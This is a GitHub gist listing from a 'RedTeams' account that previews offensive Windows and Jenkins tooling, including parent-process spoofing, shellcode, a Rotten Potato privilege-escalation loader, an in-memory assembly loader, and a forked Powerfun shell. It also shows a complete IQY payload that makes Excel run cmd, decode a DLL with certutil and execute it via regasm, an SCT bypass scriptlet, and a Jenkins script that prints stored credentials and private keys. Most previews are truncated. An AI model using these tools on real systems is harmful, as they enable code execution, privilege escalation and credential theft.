RedTeams
RedTeams
/ process_spoof.c
Created
July 21, 2019 18:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
| /* spoof.exe explorer.exe calc.exe */ | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
| typedef struct _STARTUPINFOEX { | |
| STARTUPINFO StartupInfo; | |
| LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <ole2.h> // OLE2 Definitions | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| HRESULT AutoWrap(int autoType, VARIANT *pvResult, IDispatch *pDisp, LPOLESTR ptName, int cArgs...) { | |
| va_list marker; | |
| va_start(marker, cArgs); | |
| if (!pDisp) { |
RedTeams
/ clr_demo.cs
Created
July 21, 2019 18:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.SqlServer.Server; | |
| public partial class StoredProcedures | |
| { | |
| [StructLayout(LayoutKind.Sequential)] |
RedTeams
/ shellcode_createprocess.c
Created
July 21, 2019 18:58
CreateProcessA C payload converted into a shellcode payload with the help of http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define WIN32_LEAN_AND_MEAN | |
| #pragma warning( disable : 4201 ) | |
| #include "GetProcAddressWithHash.h" | |
| #include <windows.h> | |
| #include <intrin.h> | |
| typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR); | |
| typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR); | |
| typedef BOOL(WINAPI * CREATEPROCESSA)(LPCTSTR, LPCTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION); |
RedTeams
/ invoke-potato.ps1
Created
July 21, 2019 19:00
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Potato | |
| { | |
| <# | |
| .SYNOPSIS | |
| Script leverages Reflective Potato and Invoke-ReflectivePEInjection to reflectively load Rotten Potato DLL directly into memory. This | |
| allows you to indirectly perform the Rotten Potato attack without having to touch the disk, or utilize any external loaders. | |
| The script takes a Shellcode parameter which will execute any arbitrary shellcode within the HostProc argument. Default is set to C:\Windows\System32\notepad.exe |
RedTeams
/ Execute-Assembly.ps1
Created
July 21, 2019 19:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # was a little bored, wrote up a quick Execute Assembly script lol | |
| # download watson from memory or something with DownloadString, save to a variable and invoke from with -PEBytes. | |
| function Execute-Assembly { | |
| param( | |
| [parameter(Mandatory=$true)][byte[]]$PEBytes, | |
| [parameter(Mandatory=$false)][string]$Arguments | |
| ) | |
| $meth = [System.Reflection.Assembly]::Load($bytes); |
RedTeams
/ fork-powerfun.ps1
Created
July 21, 2019 19:00
Nishang Shells in addition to its Metasploit counterpart "Powerfun.ps1" refuse to capture output from .NET methods; As such redirecting console output to a string writer fixes the problem. Helpful for running assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Powerfun - Written by Ben Turner & Dave Hardy | |
| # Forked for a few quick fixes. | |
| function Get-Webclient | |
| { | |
| $wc = New-Object -TypeName Net.WebClient | |
| $wc.UseDefaultCredentials = $true | |
| $wc.Proxy.Credentials = $wc.Credentials | |
| $wc | |
| } |
RedTeams
/ remote.iqy
Created
July 22, 2019 11:01
— forked from Mr-Un1k0d3r/remote.iqy
IQY File Remote Payload POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
RedTeams
/ bypass.sct
Created
July 22, 2019 18:29
— forked from matthiaskaiser/bypass.sct
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <package> | |
| <component id='giffile'> | |
| <registration | |
| description='Dummy' | |
| progid='giffile' | |
| version='1.00' | |
| remotable='True'> | |
| </registration> | |
| <script language='JScript'> |
RedTeams
/ jenkins-list-credentials.groovy
Created
July 29, 2019 09:28
— forked from adamyordan/jenkins-list-credentials.groovy
List credentials in Jenkins console. Jenkins store its secrets in plaintext inside memory, therefore we can lookup the credential provider instance and list all the credentials.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import com.cloudbees.plugins.credentials.* | |
| // list credentials | |
| credentials = SystemCredentialsProvider.getInstance().getCredentials() | |
| println credentials | |
| // get credential value | |
| println '' | |
| println credentials[2].getPrivateKey() |